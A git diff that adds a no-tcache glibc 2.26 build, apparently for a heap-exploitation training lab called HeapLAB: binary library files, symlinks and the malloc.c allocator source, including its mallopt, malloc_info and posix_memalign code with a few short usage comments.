+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_check_action, 2, value, check_action);
+  check_action = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
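+
+/*
+  A minimal caller-side sketch of driving the switch above through the
+  public mallopt() interface; the particular values are arbitrary
+  examples, and the helper name tune_heap is purely illustrative.
+
+    #include <malloc.h>
+
+    static void tune_heap (void)
+    {
+      mallopt (M_MXFAST, 0);                   // disable fastbins entirely
+      mallopt (M_TRIM_THRESHOLD, 256 * 1024);  // trim less eagerly
+      mallopt (M_MMAP_THRESHOLD, 512 * 1024);  // mmap only requests >= 512K
+    }
+*/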
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+         *ptr = 0;
+      }
+   }
+
+ */
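+
+/*
+  For completeness, a minimal sketch of the "always use mmap" variant
+  mentioned above: a MORECORE replacement that unconditionally reports
+  failure, so every request falls through to the mmap path.  The name
+  failing_morecore is purely illustrative.
+
+    static void *failing_morecore (ptrdiff_t increment)
+    {
+      return (void *) MORECORE_FAILURE;
+    }
+
+    #define MORECORE failing_morecore
+*/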
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
+{
+  /* Avoid using this arena in future.  We do not attempt to synchronize this
+     with anything else because we minimally want to ensure that __libc_message
+     gets its resources safely without stumbling on the current corruption.  */
+  if (ar_ptr)
+    set_arena_corrupt (ar_ptr);
+
+  if ((action & 5) == 5)
+    __libc_message ((action & 2) ? (do_abort | do_backtrace) : do_message,
+		    "%s\n", str);
+  else if (action & 1)
+    {
+      char buf[2 * sizeof (uintptr_t) + 1];
+
+      buf[sizeof (buf) - 1] = '\0';
+      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
+      while (cp > buf)
+        *--cp = '0';
+
+      __libc_message ((action & 2) ? (do_abort | do_backtrace) : do_message,
+		      "*** Error in `%s': %s: 0x%s ***\n",
+                      __libc_argv[0] ? : "<unknown>", str, cp);
+    }
+  else if (action & 2)
+    abort ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
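+
+/*
+  A minimal caller-side sketch of the wrapper above; the 64-byte
+  alignment and 1000-byte size are arbitrary.
+
+    #include <stdio.h>
+    #include <stdlib.h>
+
+    int main (void)
+    {
+      void *buf;
+      int err = posix_memalign (&buf, 64, 1000);
+      if (err != 0)            // EINVAL for a bad alignment, ENOMEM otherwise
+        return 1;
+      printf ("%p\n", buf);    // address is a multiple of 64
+      free (buf);
+      return 0;
+    }
+*/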
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   heap->size, heap->mprotect_size);
+	  total_aspace += heap->size;
+	  total_aspace_mprotect += heap->mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
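+
+/*
+  A minimal caller-side sketch: malloc_info() emits the XML built above
+  to any stdio stream, and options must currently be 0.
+
+    #include <malloc.h>
+    #include <stdio.h>
+    #include <stdlib.h>
+
+    int main (void)
+    {
+      void *p = malloc (1000);
+      malloc_info (0, stdout);   // one <heap> element per arena, then totals
+      free (p);
+      return 0;
+    }
+*/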
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.26_no-tcache/ld-2.26.so b/HeapLAB/.glibc/glibc_2.26_no-tcache/ld-2.26.so
new file mode 100755
index 0000000..0f2c0df
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.26_no-tcache/ld-2.26.so differ
diff --git a/HeapLAB/.glibc/glibc_2.26_no-tcache/ld.so.2 b/HeapLAB/.glibc/glibc_2.26_no-tcache/ld.so.2
new file mode 120000
index 0000000..82c5fee
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.26_no-tcache/ld.so.2
@@ -0,0 +1 @@
+ld-2.26.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.26_no-tcache/libc-2.26.so b/HeapLAB/.glibc/glibc_2.26_no-tcache/libc-2.26.so
new file mode 100755
index 0000000..11e0713
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.26_no-tcache/libc-2.26.so differ
diff --git a/HeapLAB/.glibc/glibc_2.26_no-tcache/libc.so.6 b/HeapLAB/.glibc/glibc_2.26_no-tcache/libc.so.6
new file mode 120000
index 0000000..898455f
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.26_no-tcache/libc.so.6
@@ -0,0 +1 @@
+libc-2.26.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.26_no-tcache/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.26_no-tcache/malloc/malloc.c
new file mode 100644
index 0000000..54e406b
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.26_no-tcache/malloc/malloc.c
@@ -0,0 +1,5655 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2017 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
